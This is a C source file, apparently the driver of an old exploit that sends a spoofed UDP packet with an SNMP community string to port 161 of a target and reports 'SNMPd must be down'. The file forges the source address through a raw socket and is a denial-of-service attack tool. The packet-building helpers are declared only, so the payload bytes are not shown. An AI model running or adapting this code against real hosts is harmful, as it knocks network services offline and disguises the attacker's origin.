
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int AF_INET ;
 int IPPROTO_RAW ;
 int SOCK_RAW ;
 int erexit (char*) ;
 int fprintf (int ,char*) ;
 int inet_addr (char*) ;
 unsigned char* makereq (char*,int*) ;
 int printf (char*,char*,char*) ;
 int sendudp (int,unsigned long*,unsigned long*,int,int,unsigned char*,int) ;
 int socket (int ,int ,int ) ;
 int stdout ;
 int strcmp (char*,char*) ;
 char* strdup (char*) ;
 int usage () ;

int main(int argc, char **argv)
{
 char *saddr,*daddr,*community;
 unsigned char *buf;
 int size;
 int sock;
 unsigned long lsaddr,ldaddr;
 int i;

 saddr = ((void*)0);
 daddr = ((void*)0);
 if (argc != 7) { usage(); erexit("not enough args\n"); }

 if (!strcmp(argv[1],"-s"))
   saddr = strdup(argv[2]);
 if (!strcmp(argv[3],"-d"))
   daddr = strdup(argv[4]);
 if (!strcmp(argv[5],"-c"))
   community = strdup(argv[6]);

 printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);

 if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
   erexit("Invalid source/destination IP address\n");

 if (saddr == ((void*)0)) { usage(); erexit("No Source Address"); }
 if (daddr == ((void*)0)) { usage(); erexit("No Dest Address"); }

 sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
 if (sock == -1)
   erexit("Couldnt open Raw socket!(Are you root?)\n");

 lsaddr = inet_addr(saddr);
 ldaddr = inet_addr(daddr);

 buf = makereq(community,&size);

 sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
 fprintf(stdout,"Sent packet. SNMPd must be down.\n");
 return 0;

}
